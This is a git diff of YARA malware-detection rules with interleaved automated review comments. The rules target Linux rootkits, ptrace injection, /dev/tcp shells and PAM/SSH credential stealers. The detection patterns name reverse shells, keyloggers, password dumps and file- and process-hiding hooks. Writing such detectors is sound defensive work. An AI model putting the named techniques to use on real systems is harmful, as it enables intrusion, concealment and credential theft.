index e29b4c4c1..d6dc08874 100644
--- a/rules/evasion/logging/hide_shell_history.yara
+++ b/rules/evasion/logging/hide_shell_history.yara
@@ -13,7 +13,6 @@ rule hide_shell_history: high {
 $h_shopt_history = "shopt -ou history"
 $h_set_o_history = "set +o history"
 $histsize_0 = "HISTSIZE=0"
- $h_gotcha = "GOTCHA"
 $not_increment = "HISTSIZE++"
 condition:
diff --git a/rules/evasion/logging/historical_logins.yara b/rules/evasion/logging/historical_logins.yara
index 744adf978..8f348a1a4 100644
--- a/rules/evasion/logging/historical_logins.yara
+++ b/rules/evasion/logging/historical_logins.yara
@@ -1,4 +1,4 @@
-rule login_records: high {
+rule login_records: medium {
 meta:
 description = "accesses historical login records"
 hash_2023_FontOnLake_45E94ABEDAD8C0044A43FF6D72A5C44C6ABD9378_elf = "f60c1214b5091e6e4e5e7db0c16bf18a062d096c6d69fe1eb3cbd4c50c3a3ed6"
diff --git a/rules/evasion/logging/syslog.yara b/rules/evasion/logging/syslog.yara
index 613ecc599..f2bb2e030 100644
--- a/rules/evasion/logging/syslog.yara
+++ b/rules/evasion/logging/syslog.yara
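Review bot: The rule name `full` in dev_log.yara says nothing about what it matches and is exactly the kind of generic identifier that collides once rules share a namespace; `rule dev_log: medium linux {` matches both the file name and the `$val` string. The description `device where local syslog messages are read` describes the device rather than the behaviour being flagged; `references the local syslog socket /dev/log` is closer to what the string proves.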
@@ -22,6 +22,7 @@ rule var_log_syslog_elf: high {
 $not_syslog_conf = "/etc/syslog.conf"
 $not_rsyslog_conf = "/etc/rsyslog.conf"
 $not_rsyslog = "RSYSLOG" fullword
+ $not_top = "~/.toprc"
 condition:
 filesize < 1MB and uint32(0) == 1179403647 and any of ($ref*) and none of ($not*)
diff --git a/rules/evasion/mimicry/fake-library.yara b/rules/evasion/mimicry/fake-library.yara
index 142516adc..fe93f4c0b 100644
--- a/rules/evasion/mimicry/fake-library.yara
+++ b/rules/evasion/mimicry/fake-library.yara
@@ -33,8 +33,10 @@ rule libc_fake_number_val: high {
 hash_2023_uacert_refs = "106eef08f3bfcced3e221ee6f789792650386d7794d30c80eae19e42ef893682"
 strings:
- $fake_libc_version = /libc.so.[2345789]/
+ $ref = /libc.so.[2345789]/
+ $not_go_example = "libc.so.96.1"
 condition:
- any of them
+ $ref and none of ($not*)
 }
+
diff --git a/rules/evasion/net/http_443.yara b/rules/evasion/net/http_443.yara
index fc0f2daf4..7d4913ba9 100644
--- a/rules/evasion/net/http_443.yara
+++ b/rules/evasion/net/http_443.yara
@@ -7,6 +7,7 @@ rule http_port_443: high {
 $not_test = "assertEqual"
 $not_example = "http://example.com:443"
 $not_localhost = "http://localhost:443"
+ $not_foo = "http://foo.com:443/"
 condition:
 $http_443 and none of ($not*)
diff --git a/rules/evasion/process_injection/process-inject.yara b/rules/evasion/process_injection/process-inject.yara
index b214d4f19..7221d4021 100644
--- a/rules/evasion/process_injection/process-inject.yara
+++ b/rules/evasion/process_injection/process-inject.yara
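Review bot: In the renamed `$ref = /libc.so.[2345789]/` of libc_fake_number_val the two dots are unescaped, so `.` matches any byte and text shaped like `libcXsoY7` satisfies a `high` rule meant for a fake soname; `$ref = /libc\.so\.[2345789]/` is the precise form. The new `$not_go_example` carve-out is reasonable but, like every `none of ($not*)` veto, suppresses the rule for any file containing that one string. The rule's header is outside this hunk.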
@@ -1,20 +1,3 @@
-rule ptrace_injector: high {
- meta:
- description = "may inject code into other processes"
- hash_2024_procinject_infect = "cb7c09e58c5314e0429ace2f0e1f3ebd0b802489273e4b8e7531ea41fa107973"
-
- strings:
- $maps = /\/{0,1}proc\/[%{][%}\w]{0,1}\/maps/
- $ptrace = "ptrace" fullword
- $proc = "process" fullword
- $not_qemu = "QEMU_IS_ALIGNED"
- $not_chromium = "CHROMIUM_TIMESTAMP"
- $not_crashpad = "CRASHPAD" fullword
-
- condition:
- filesize < 67108864 and $maps and $ptrace and $proc and none of ($not*)
-}
-
 rule library_injector: high {
 meta:
 description = "may inject code into other processes"
diff --git a/rules/evasion/process_injection/ptrace.yara b/rules/evasion/process_injection/ptrace.yara
index 5ac24b40a..a43eab298 100644
--- a/rules/evasion/process_injection/ptrace.yara
+++ b/rules/evasion/process_injection/ptrace.yara
@@ -12,3 +12,35 @@ rule ptrace: medium {
 condition:
 any of them
 }
+
+rule ptrace_injector: high {
+ meta:
+ description = "may inject code into other processes"
+ hash_2024_procinject_infect = "cb7c09e58c5314e0429ace2f0e1f3ebd0b802489273e4b8e7531ea41fa107973"
+
+ strings:
+ $maps = /\/{0,1}proc\/[%{][%}\w]{0,1}\/maps/
+ $ptrace = "ptrace" fullword
+ $proc = "process" fullword
+
+ condition:
+ filesize < 67108864 and $maps and $ptrace and $proc
+}
+
+rule known_ptrace_injectors: override {
+ meta:
+ description = "known"
+ ptrace_injector = "medium"
+ proc_d_exe_high = "medium"
+
+ strings:
+ $not_qemu = "QEMU_IS_ALIGNED"
+ $not_chromium = "CHROMIUM_TIMESTAMP"
+ $not_crashpad = "CRASHPAD" fullword
+ $not_perf = "PERF_SAMPLE" fullword
+ $not_trace = "TRACE_REQ" fullword
+ $not_bpf = "BPF" fullword
+
+ condition:
+ ptrace and any of them
+}
diff --git a/rules/evasion/rootkit/kernel.yara b/rules/evasion/rootkit/kernel.yara
new file mode 100644
index 000000000..76fbdddd9
--- /dev/null
+++ b/rules/evasion/rootkit/kernel.yara
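Review bot: In known_ptrace_injectors the exclusion `$not_bpf = "BPF" fullword` replaces the earlier `/sys/fs/bpf` path with a three-letter token found in many unrelated binaries (packet filters, tracing, debug strings), so the downgrade of ptrace_injector and proc_d_exe_high to medium will apply far beyond the profiler- and emulator-style tools the other strings name; keeping the path form `$not_bpf = "/sys/fs/bpf"` is safer. `description = "known"` also gives the reader nothing; something like `description = "known legitimate ptrace users (emulators, crash handlers, profilers)"` fits the strings. Note the condition keys on the medium rule `ptrace` rather than on `ptrace_injector`, which is only equivalent if every ptrace_injector hit also satisfies ptrace's strings, which are outside this hunk.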
@@ -0,0 +1,48 @@
+rule linux_kernel_module_getdents64: critical linux {
+ meta:
+ description = "kernel module that intercepts directory listing"
+ ref = "https://github.com/m0nad/Diamorphine"
+ hash_2022_LQvKibDTq4_diamorphine = "aec68cfa75b582616c8fbce22eecf463ddb0c09b692a1b82a8de23fb0203fede"
+ hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
+ hash_2023_LQvKibDTq4_diamorphine = "d83f43f47c1438d900143891e7a542d1d24f9adcbd649b7698d8ee7585068039"
+ filetypes = "elf,so"
+
+ strings:
+ $getdents64 = "getdents64"
+ $register_kprobe = "register_kprobe"
+
+ condition:
+ filesize < 1MB and all of them
+}
+
+rule funky_high_signal_killer: high {
+ meta:
+ description = "Uses high signals to communicate to a rootkit"
+ hash_2023_Qubitstrike_branch_raw_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd"
+ hash_2023_Qubitstrike_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd"
+ hash_2024_locutus_borg_transwarp = "4573af129e3e1a197050e2fd066f846c92de64d8d14a81a13d975a2cbc6d391e"
+
+ strings:
+ $odd_teen_sig = /kill -1[012346789]/ fullword
+ $high_sig = /kill -[23456]\d/ fullword
+
+ condition:
+ filesize < 10MB and any of them
+}
+
+rule lkm_dirent: high {
+ meta:
+ description = "kernel rootkit designed to hide files (linux_dirent)"
+ hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
+ filetypes = "so"
+
+ strings:
+ $l_dirent = "linux_dirent"
+ $linux = "Linux"
+ $not_syscalls = "#define _LINUX_SYSCALLS_H"
+ $not_itimer = "__kernel_old_itimerval"
+ $not_internal = "internal_getdents"
+
+ condition:
+ filesize < 2MB and all of ($l*) and none of ($not*)
+}
diff --git a/rules/impact/rootkit/refs.yara b/rules/evasion/rootkit/refs.yara
similarity index 100%
rename from rules/impact/rootkit/refs.yara
rename to rules/evasion/rootkit/refs.yara
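Review bot: linux_kernel_module_getdents64 lists the meta key `hash_2023_LQvKibDTq4_diamorphine` twice with different values, and funky_high_signal_killer lists the same hash under both `hash_2023_Qubitstrike_branch_raw_mi` and `hash_2023_Qubitstrike_mi`; YARA accepts repeated meta identifiers, but tooling that maps meta to a dictionary keeps only one, so give the second diamorphine entry a distinct key (e.g. `hash_2023_LQvKibDTq4_diamorphine_d83f = "d83f43f47c1438d900143891e7a542d1d24f9adcbd649b7698d8ee7585068039"`) and drop the duplicate Qubitstrike line. lkm_dirent's `filetypes = "so"` also looks narrow for a kernel-module detector, whose artefacts are `.ko` relocatable ELF objects; if the project's filetype vocabulary has a kernel-module type use it, otherwise `elf,so` as in the first rule.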
diff --git a/rules/evasion/rootkit/userspace.yara b/rules/evasion/rootkit/userspace.yara
new file mode 100644
index 000000000..91106a0b2
--- /dev/null
+++ b/rules/evasion/rootkit/userspace.yara
@@ -0,0 +1,155 @@
+rule readdir_intercept_source: high {
+ meta:
+ description = "userland rootkit source designed to hide files (DECLARE_READDIR)"
+ filetypes = "so,c"
+
+ strings:
+ $declare = "DECLARE_READDIR"
+ $hide = "hide"
+
+ condition:
+ filesize < 200KB and all of them
+}
+
+rule readdir_intercept: high {
+ meta:
+ description = "userland rootkit designed to hide files (readdir64)"
+ hash_2023_lib_pkit = "8faa04955eeb6f45043003e23af39b86f1dbfaa12695e0e1a1f0bc7a15d0d116"
+ hash_2023_lib_pkitarm = "67de6ba64ee94f2a686e3162f2563c77a7d78b7e0404e338a891dc38ced5bd71"
+ hash_2023_lib_skit = "427b1d16f16736cf8cee43a7c54cd448ca46ac9b573614def400d2d8d998e586"
+ filetypes = "so,c"
+
+ strings:
+ $r_new65 = "readdir64" fullword
+ $r_old64 = "_readdir64"
+ $r_new32 = "readdir" fullword
+ $r_old32 = "_readdir"
+ $not_ld_debug = "LD_DEBUG"
+ $not_libc = "getusershell"
+
+ condition:
+ filesize < 2MB and uint32(0) == 1179403647 and all of ($r*) and none of ($not*)
+}
+
+rule readdir_tcp_wrapper_intercept: high {
+ meta:
+ description = "userland rootkit designed to hide files and bypass tcp-wrappers"
+ ref = "https://github.com/ldpreload/Medusa"
+ filetypes = "so,c"
+
+ strings:
+ $r_new65 = "readdir64" fullword
+ $r_old64 = "_readdir64"
+ $r_new32 = "readdir" fullword
+ $r_old32 = "_readdir"
+ $r_hosts_access = "hosts_access"
+
+ condition:
+ filesize < 2MB and uint32(0) == 1179403647 and all of ($r*)
+}
+
+rule medusa_like_ld_preload: critical linux {
+ meta:
+ description = "LD_PRELOAD rootkit"
+ ref = "https://github.com/ldpreload/Medusa"
+
+ strings:
+ $cloned_thread = "DYNAMIC LINKER BUG!"
+ $__execve = "__execve" fullword
+ $lxstat64 = "__lxstat64" fullword
+ $syslog = "syslog" fullword
+ $LD_PRELOAD = "LD_PRELOAD" fullword
+ $LD_LIBRARY_PATH = "LD_LIBRARY_PATH" fullword
+ $archloaded = "archloaded" fullword
+ $rkload = "rkload" fullword
+ $wcs = "wcsmbsload" fullword
+ $readdir64 = "readdir64" fullword
+
+ condition:
+ filesize < 2MB and 85 % of them
+}
+
+rule linux_rootkit_terms: critical linux {
+ meta:
+ description = "appears to be a Linux rootkit"
+ filetypes = "elf,so"
+
+ strings:
+ $s_Rootkit = "Rootkit"
+ $s_r00tkit = "r00tkit"
+ $s_r00tk1t = "r00tk1t"
+ $s_rootkit = "rootkit" fullword
+
+ $o_systemctl = "systemctl" fullword
+ $o_sshd = "sshd" fullword
+ $o_miner = "miner" fullword
+
+ condition:
+ filesize < 10MB and any of ($s*) and any of ($o*)
+}
+
+rule elf_processhide: high {
+ meta:
+ description = "userland rootkit designed to hide processes"
+ hash_2023_Unix_Coinminer_Xanthe_0e6d = "0e6d37099dd89c7eed44063420bd05a2d7b0865a0f690e12457fbec68f9b67a8"
+ hash_2023_Unix_Malware_Agent_7337 = "73376cbb9666d7a9528b9397d4341d0817540448f62b22b51de8f6a3fb537a3d"
+ hash_2023_Unix_Trojan_Prochider_234c = "234c0dd014a958cf5958a9be058140e29f46fca99eb26f5755f5ae935af92787"
+
+ strings:
+ $prochide = "processhide"
+ $process_to_filter = "process_to_filter"
+
+ condition:
+ all of them
+}
+
+rule linux_process_hider: critical linux {
+ meta:
+ description = "userland rootkit designed to hide processes"
+ ref = "prochid.c"
+ hash_2023_OK_c38c = "c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a"
+ hash_2023_lib_pkit = "8faa04955eeb6f45043003e23af39b86f1dbfaa12695e0e1a1f0bc7a15d0d116"
+ hash_2023_lib_pkitarm = "67de6ba64ee94f2a686e3162f2563c77a7d78b7e0404e338a891dc38ced5bd71"
+
+ strings:
+ $f_proc_self_fd = "/proc/self/fd/%d"
+ $f_proc_stat = "/proc/%s/stat"
+ $f_readdir = "readdir"
+ $f_dlsym = "dlsym"
+ $f_readlink = "readlink"
+ $x_hide_process = "hide_proc" fullword
+ $x_proc_hide = "proc_hide" fullword
+ $x_process_hide =
"process_hide" fullword
+ $x_process_hiding = "process_hiding" fullword
+ $x_hidden_proc = "hidden_proc" fullword
+ $x_prochide = "processhide"
+ $x_process_to_filter = "process_to_filter"
+ $x_old_readdir = "old_readdir"
+ $x_orig_readdir = "orig_readdir"
+ $x_original_readdir = "original_readdir"
+ $x_readdirOriginal = "readdirOriginal"
+ $x_backdoor = "backdoor" fullword
+ $x_is_hidden = "is_hidden" fullword
+ $x_hidden_gid = "HIDDEN_GID" fullword
+ $x_revshell = "revshell" fullword
+ $x_cmdline = "/proc/self/cmdline"
+ $not_bpf = "/sys/fs/bpf"
+
+ condition:
+ filesize < 250KB and all of ($f*) and any of ($x*) and none of ($not*)
+}
+
+rule process_hider: high {
+ meta:
+ description = "possible userland rootkit designed to hide processes"
+
+ strings:
+ $hide_process = "hide_proc" fullword
+ $proc_hide = "proc_hide" fullword
+ $process_hide = "process_hide" fullword
+ $process_hiding = "process_hiding" fullword
+ $hidden_proc = "hidden_proc" fullword
+
+ condition:
+ filesize < 250KB and any of them
+}
diff --git a/rules/evasion/hidden_paths/relative-hidden.yara b/rules/exec/program/hidden.yara
similarity index 91%
rename from rules/evasion/hidden_paths/relative-hidden.yara
rename to rules/exec/program/hidden.yara
index 2797027c3..6c76d9529 100644
--- a/rules/evasion/hidden_paths/relative-hidden.yara
+++ b/rules/exec/program/hidden.yara
@@ -1,4 +1,4 @@
-rule relative_hidden_launcher {
+rule relative_hidden_launcher: medium {
 strings:
 $relative_hidden = /\.\/\.[\w][\w\/\.\_\-]{3,16}/ fullword
 $x_exec = "exec"
diff --git a/rules/exec/shell/bash_dev_tcp.yara b/rules/exec/shell/bash_dev_tcp.yara
index 7df0c2aeb..d0bc02be4 100644
--- a/rules/exec/shell/bash_dev_tcp.yara
+++ b/rules/exec/shell/bash_dev_tcp.yara
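Review bot: readdir_intercept and readdir_tcp_wrapper_intercept declare `filetypes = "so,c"` but their conditions require `uint32(0) == 1179403647`, which a `.c` source file can never satisfy, so the `c` entry is either dead or, if filetypes acts as a pre-filter, misleading; readdir_intercept_source is the rule that should carry `c`. In both rules `$r_new65` reads like a typo for `$r_new64`. linux_rootkit_terms (critical) fires on one `$s*` plus one `$o*`, and `"rootkit"` fullword next to `"sshd"` or `"systemctl"` is plausibly present in defensive agents and security tooling shipped as ELF, so consider `2 of ($o*)` or a `$not_` list before rating it critical. This hunk starts at the beginning of userspace.yara two lines above.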
@@ -1,16 +1,14 @@
 rule bash_dev_tcp: high exfil {
 meta:
- description = "uses /dev/tcp for network access (bash)"
- hash_2023_UPX_0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d_elf_x86_64 = "818b80a08418f3bb4628edd4d766e4de138a58f409a89a5fdba527bab8808dd2"
- hash_2023_usr_adxintrin_b = "a51a4ddcd092b102af94139252c898d7c1c48f322bae181bd99499a79c12c500"
- hash_2023_spirit = "26ba215bcd5d8a9003a904b0eac7dc10054dba7bea9a708668a5f6106fd73ced"
+ description = "uses /dev/tcp for network access (bash)"
 strings:
- $ref = "/dev/tcp"
+ $ref = /\/dev\/tcp[\/\w\.]{8,16}\/\d{1,6}/
 $posixly_correct = "POSIXLY_CORRECT"
 $not_comment = "# Check that both our processes are running on their tcp port"
 $not_get = /GET \/ HTTP\/1.1\n{1,2} >/
 $not_localhost_8080 = "/dev/tcp/127.0.0.1/8080"
+ $not_lsof = "/proc/tcp" fullword
 condition:
 $ref and not $posixly_correct and none of ($not*)
diff --git a/rules/exec/shell/nohup.yara b/rules/exec/shell/nohup.yara
index b42dc1a00..a11f35f9c 100644
--- a/rules/exec/shell/nohup.yara
+++ b/rules/exec/shell/nohup.yara
@@ -36,21 +36,6 @@ rule elf_nohup: high {
 uint32(0) == 1179403647 and filesize < 1MB and any of ($nohup*) and none of ($not*)
 }
-rule trap_1: high {
- meta:
- description = "Protects itself from early termination via SIGHUP"
- hash_2023_Linux_Malware_Samples_3059 = "305901aa920493695729132cfd20cbddc9db2cf861071450a646c6a07b4a50f3"
- hash_2023_Linux_Malware_Samples_553a = "553ac527d6a02a84c787fd529ea59ce1eb301ddfb180d89b9e62108d92894185"
- hash_2023_Linux_Malware_Samples_7a60 = "7a60c84fb34b2b3cd7eed3ecd6e4a0414f92136af656ed7d4460b8694f2357a7"
-
- strings:
- $ref = "trap '' 1"
- $ref2 = "trap \"\" 1"
-
- condition:
- any of them
-}
-
 rule nohup_bash: high {
 meta:
 description = "Calls bash with nohup"
diff --git a/rules/exec/shell/sighup_trap.yara b/rules/exec/shell/sighup_trap.yara
new file mode 100644
index 000000000..235b5d272
--- /dev/null
+++ b/rules/exec/shell/sighup_trap.yara
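Review bot: The new `$ref = /\/dev\/tcp[\/\w\.]{8,16}\/\d{1,6}/` drops coverage the literal `"/dev/tcp"` had: the class has no `$`, `{`, `}` or `-`, so redirections whose host is a shell variable or a hyphenated hostname no longer match, and the `{8,16}` floor also rejects short hosts such as `/dev/tcp/a.b/80`. A bounded pattern that keeps those forms while still requiring a host and a port is `$ref = /\/dev\/tcp\/[\$\{\}\w\.\-]{1,64}\/[\$\{\}\w]{1,16}/`; the existing `$not_localhost_8080`-style exclusions continue to handle test fixtures.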
@@ -0,0 +1,15 @@
+rule trap_1: high {
+ meta:
+ description = "Protects itself from early termination via SIGHUP"
+ hash_2023_Linux_Malware_Samples_3059 = "305901aa920493695729132cfd20cbddc9db2cf861071450a646c6a07b4a50f3"
+ hash_2023_Linux_Malware_Samples_553a = "553ac527d6a02a84c787fd529ea59ce1eb301ddfb180d89b9e62108d92894185"
+ hash_2023_Linux_Malware_Samples_7a60 = "7a60c84fb34b2b3cd7eed3ecd6e4a0414f92136af656ed7d4460b8694f2357a7"
+
+ strings:
+ $ref = "trap '' 1"
+ $ref2 = "trap \"\" 1"
+ $not_netcat_example = "ignore most signals; the parent will nuke the kid"
+
+ condition:
+ any of ($ref*) and none of ($not*)
+}
diff --git a/rules/exfil/stealer/pam.yara b/rules/exfil/stealer/pam.yara
index 4c7fa9238..1513b5e57 100644
--- a/rules/exfil/stealer/pam.yara
+++ b/rules/exfil/stealer/pam.yara
@@ -14,14 +14,15 @@ rule pam_passwords: high {
 $f_orig_auth = "orig_pam_authenticate"
 $f_getifaddrs = "getifaddrs" fullword
 $f_keylogger = "keylogger"
- $f_tmp = "/tmp/"
+ $f_tmp = /\/tmp\/[\.\w\-]{2,}/
 $f_ssh = "/bin/ssh"
+ $f_sshpass = "sshpass"
 $f_sendto = "sendto" fullword
 $not_pam_service = "--pam-service"
 $not_pam_acct = "pam_acct_mgmt"
 condition:
- $auth and $pass and 2 of ($f*) and none of ($not*)
+ $auth and $pass and 3 of ($f*) and none of ($not*)
 }
 rule pam_passwords_rootkit: critical {
diff --git a/rules/exfil/stealer/ssh.yara b/rules/exfil/stealer/ssh.yara
index 008799cce..6fb58f29d 100644
--- a/rules/exfil/stealer/ssh.yara
+++ b/rules/exfil/stealer/ssh.yara
@@ -48,3 +48,25 @@ rule stealssh: critical {
 condition:
 filesize < 10MB and $folder and any of ($steal*)
 }
+
+rule sshd_tmp_policy: high {
+ meta:
+ description = "adjusts sshd tmp policy, possibly to dump credentials"
+
+ strings:
+ $unconfined = "unconfined_u:object_r:sshd_tmp_t:s0"
+
+ condition:
+ any of them
+}
+
+rule ssh_pass_file: high {
+ meta:
+ description = "may store SSH passwords"
+
+ strings:
+ $unconfined = /sshpass\w\.txt/
+
+ condition:
+ any of them
+}
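Review bot: `$f_tmp = /\/tmp\/[\.\w\-]{2,}/` in pam_passwords has no upper bound, unlike every other regex in this change, which caps its repetitions; `$f_tmp = /\/tmp\/[\.\w\-]{2,64}/` keeps the match and stays consistent with the file's bounded quantifiers. The rule's header is outside this hunk.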
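Review bot: ssh_pass_file's `$unconfined = /sshpass\w\.txt/` reuses a variable name copied from sshd_tmp_policy that has nothing to do with the pattern, and the single `\w` means `sshpass.txt` and `sshpass12.txt` do not match while `sshpassA.txt` does; `$ref = /sshpass\w{0,8}\.txt/` covers the plain and suffixed forms. The `unconfined_u:object_r:sshd_tmp_t:s0` string in sshd_tmp_policy is an SELinux file context that also appears in policy files and labelling tools, so the `possibly to dump credentials` wording in its description is an inference the string alone does not support; `references the SELinux sshd_tmp_t context` is what it proves.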
diff --git a/rules/false_positives/libdw.yara b/rules/false_positives/libdw.yara
new file mode 100644
index 000000000..17fc183d8
--- /dev/null
+++ b/rules/false_positives/libdw.yara
@@ -0,0 +1,11 @@
+rule libdw_override: override {
+ meta:
+ description = "libdw.so"
+ ptrace_injector = "medium"
+
+ strings:
+ $dward = "invalid DWARF"
+
+ condition:
+ filesize < 2MB and any of them
+}
diff --git a/rules/false_positives/slirp.yara b/rules/false_positives/slirp.yara
index 50032a2e1..87550ab83 100644
--- a/rules/false_positives/slirp.yara
+++ b/rules/false_positives/slirp.yara
@@ -3,6 +3,7 @@ rule slirp4netns: override linux {
 description = "slirp4netns"
 login_records = "medium"
 linux_critical_system_paths_high = "medium"
+ fetch_tool = "medium"
 strings:
 $auth = "SLIRP_DEBUG"
diff --git a/rules/false_positives/snapd.yara b/rules/false_positives/snapd.yara
index 3ef08dc4b..ffc913462 100644
--- a/rules/false_positives/snapd.yara
+++ b/rules/false_positives/snapd.yara
@@ -7,12 +7,15 @@ rule snapd: override linux {
 dev_mmc = "medium"
 busybox_runner = "medium"
 system_log_references = "medium"
+ hidden_x11 = "medium"
 filetypes = "elf,so"
 strings:
 $snapd_snapd = "SNAPD_SNAPD"
 $snapd = "snapcore/snapd"
+ $snapd_debug = "SNAPD_DEBUG"
+ $snap_name = "SNAP_NAME" fullword
 condition:
- filesize > 15MB and filesize < 30MB and uint32(0) == 1179403647 and any of them
+ filesize > 1MB and filesize < 30MB and uint32(0) == 1179403647 and any of them
 }
diff --git a/rules/false_positives/sudo.yara b/rules/false_positives/sudo.yara
index bd3f714f8..0fda2af79 100644
--- a/rules/false_positives/sudo.yara
+++ b/rules/false_positives/sudo.yara
@@ -1,10 +1,13 @@
 rule sudo: override linux {
 meta:
- description = "sudo"
- proc_exe = "medium"
+ description = "sudo"
+ proc_c_exe = "medium"
+ small_elf_sudoer = "medium"
+ proc_d_exe_high = "medium"
 strings:
- $ref = "SUDO_INTERCEPT_FD"
+ $ref = "SUDO_INTERCEPT_FD"
+ $ref2 = "SUDO_EDITOR"
 condition:
 any of them
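Review bot: The snapd override now triggers on `$snap_name = "SNAP_NAME" fullword` while its size floor drops from 15MB to 1MB; SNAP_NAME is an environment variable snapd exports to every confined snap application, so any ELF above 1MB that reads it would have hidden_x11, dev_mmc, busybox_runner and system_log_references downgraded to medium, not just snapd itself. Keep the snapd-specific strings decisive, e.g. `filesize > 1MB and filesize < 30MB and uint32(0) == 1179403647 and ($snapd_snapd or $snapd or 2 of them)`. The rule's header is outside this hunk.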
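Review bot: The sudo override sets `proc_c_exe = "medium"`, but no rule by that name exists in this change; pid-exe.yara introduces proc_s_exe, proc_d_exe, proc_d_exe_high and proc_py_exe, and vmtools.yara uses `proc_s_exe = "medium"` for the same purpose, so this line looks like a typo that silently downgrades nothing. Change it to `proc_s_exe = "medium"`. Adding `$ref2 = "SUDO_EDITOR"` under `any of them` also widens the override to anything that honours that variable, without the `filesize` and `uint32(0)` guards the other overrides in this change use.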
diff --git a/rules/false_positives/vmtools.yara b/rules/false_positives/vmtools.yara
index bec7a593e..2d5888698 100644
--- a/rules/false_positives/vmtools.yara
+++ b/rules/false_positives/vmtools.yara
@@ -3,10 +3,14 @@ rule vmtools: override {
 description = "vmtools"
 backdoor = "medium"
 linux_critical_system_paths_high = "medium"
+ proc_net_route_high = "medium"
+ proc_s_exe = "medium"
+ sys_net_recon_exfil = "medium"
 strings:
- $vmtools = "VMTools_LoadConfig" fullword
+ $vmtools = "VMTools" fullword
 $vmsupport = "VMSUPPORT" fullword
+ $vmware = "VMware" fullword
 condition:
 filesize < 1MB and uint32(0) == 1179403647 and any of them
diff --git a/rules/fs/permission/permission-modify-dangerous.yara b/rules/fs/permission/permission-modify-dangerous.yara
index 8af721630..5762cbc6a 100644
--- a/rules/fs/permission/permission-modify-dangerous.yara
+++ b/rules/fs/permission/permission-modify-dangerous.yara
@@ -22,6 +22,7 @@ rule chmod_dangerous_exec: high exfil {
 $not_chmod_01777 = "chmod 01777"
 $not_chromium = "CHROMIUM_TIMESTAMP"
 $not_var_tmp = "chmod 0777 /var/tmp" fullword
+ $not_extutils = "chmod 0777, [.foo.bar] doesn't work on VMS"
 condition:
 filesize < 50MB and $ref and none of ($not*)
diff --git a/rules/fs/proc/arbitrary-pid.yara b/rules/fs/proc/arbitrary-pid.yara
index 47419fd05..def32edf6 100644
--- a/rules/fs/proc/arbitrary-pid.yara
+++ b/rules/fs/proc/arbitrary-pid.yara
@@ -6,10 +6,10 @@ rule proc_arbitrary: medium {
 hash_2023_Downloads_98e7 = "98e7808bd5bfd72c08429ffe0ffb52ae54bce7e6389f17ae523e8ae0099489ab"
 strings:
- $string_val = /\/proc\/[%{$][\/\$\w\}]{0,12}/
+ $ref = /\/proc\/[%{$][\/\$\w\}]{0,12}/
 condition:
- any of them
+ $ref
 }
 rule pid_match: medium {
diff --git a/rules/fs/proc/pid-exe.yara b/rules/fs/proc/pid-exe.yara
index 44496b6ce..6342a7595 100644
--- a/rules/fs/proc/pid-exe.yara
+++ b/rules/fs/proc/pid-exe.yara
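Review bot: Broadening `$vmtools` to `"VMTools"` and adding `$vmware = "VMware" fullword` under `any of them` means any ELF under 1MB that merely mentions VMware, a token common in hypervisor-detection code, drivers and DMI lookups, now has backdoor, linux_critical_system_paths_high, proc_net_route_high, proc_s_exe and sys_net_recon_exfil downgraded to medium. Require corroboration, e.g. `filesize < 1MB and uint32(0) == 1179403647 and 2 of them`, or keep `VMTools_LoadConfig` as the decisive string. The rule's header is outside this hunk.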
@@ -1,13 +1,51 @@
-rule proc_exe: high {
+rule proc_s_exe: high {
 meta:
- description = "accesses underlying executable of other processes"
- hash_2023_OK_4f5c = "4f5cfb805feb7576e594f1bb3b773ba0ca80e09e49bfb7e3507f815f774ac62d"
- hash_2023_Pupy_2ab5 = "2ab59fa690e502a733aa1500a96d8e94ecb892ed9d59736cca16a09538ce7d77"
- hash_2023_Unix_Dropper_Mirai_58c5 = "58c54ded0af2fffb8cea743d8ec3538cecfe1afe88d5f7818591fb5d4d2bd4e1"
+ description = "accesses underlying executable of other processes"
+
+ strings:
+ $string = "/proc/%s/exe" fullword
+ $not_tool = /[Uu]sage:/ fullword
+
+ condition:
+ $string and none of ($not*)
+}
+
+rule proc_d_exe: medium {
+ meta:
+ description = "accesses underlying executable of other processes"
+
+ strings:
+ $digit = "/proc/%d/exe" fullword
+ $not_cgroup = "cgroup" fullword
+ $not_tool = /[Uu]sage:/ fullword
+
+ condition:
+ $digit and none of ($not*)
+}
+
+rule proc_d_exe_high: high {
+ meta:
+ description = "accesses underlying executable of other processes"
+
+ strings:
+ $ref = "/proc/%d/exe" fullword
+
+ $o_sign = "/etc/init.d"
+ $o_net_dev = "/proc/net/dev"
+ $o_bash = "/bin/bash"
+ $o_tty = "/dev/tty"
+ $o_var_tmp = "/var/tmp"
+ $o_osrelease = "/proc/sys/kernel/osrelease"
+
+ condition:
+ filesize < 5MB and $ref and any of ($o*)
+}
+
+rule proc_py_exe: high {
+ meta:
+ description = "accesses underlying executable of other processes"
 strings:
- $string = "/proc/%s/exe" fullword
- $digit = "/proc/%d/exe" fullword
 $python = "/proc/{}/exe" fullword
 condition:
diff --git a/rules/hw/dev/kmem.yara b/rules/hw/dev/kmem.yara
index 0f555caba..5110cda09 100644
--- a/rules/hw/dev/kmem.yara
+++ b/rules/hw/dev/kmem.yara
@@ -9,6 +9,7 @@ rule kmem: high bsd {
 // entries from include/paths.h
 $not_cshell = "_PATH_CSHELL" fullword
 $not_rwho = "_PATH_RWHODIR" fullword
+ $not_lsof = "lsof" fullword
 condition:
 $val and none of ($not*)
diff --git a/rules/hw/dev/sd_mmc.yara b/rules/hw/dev/sd_mmc.yara
index 7ae5710b3..939fa1d9e 100644
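Review bot: All four rules in pid-exe.yara carry the identical `description = "accesses underlying executable of other processes"`, so a report cannot tell the `%s`, `%d`, `{}` and corroborated variants apart; suggest naming the distinguishing feature in each, e.g. `description = "accesses underlying executable of other processes (/proc/%d/exe plus system paths)"` for proc_d_exe_high. The `$not_tool = /[Uu]sage:/ fullword` exclusion in proc_s_exe and proc_d_exe, like `$not_lsof = "lsof" fullword` added to kmem.yara on this line, clears the rule for any file that prints a usage banner or names lsof, which is not a property of benign tooling only. proc_py_exe's condition continues beyond this hunk.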
--- a/rules/hw/dev/sd_mmc.yara
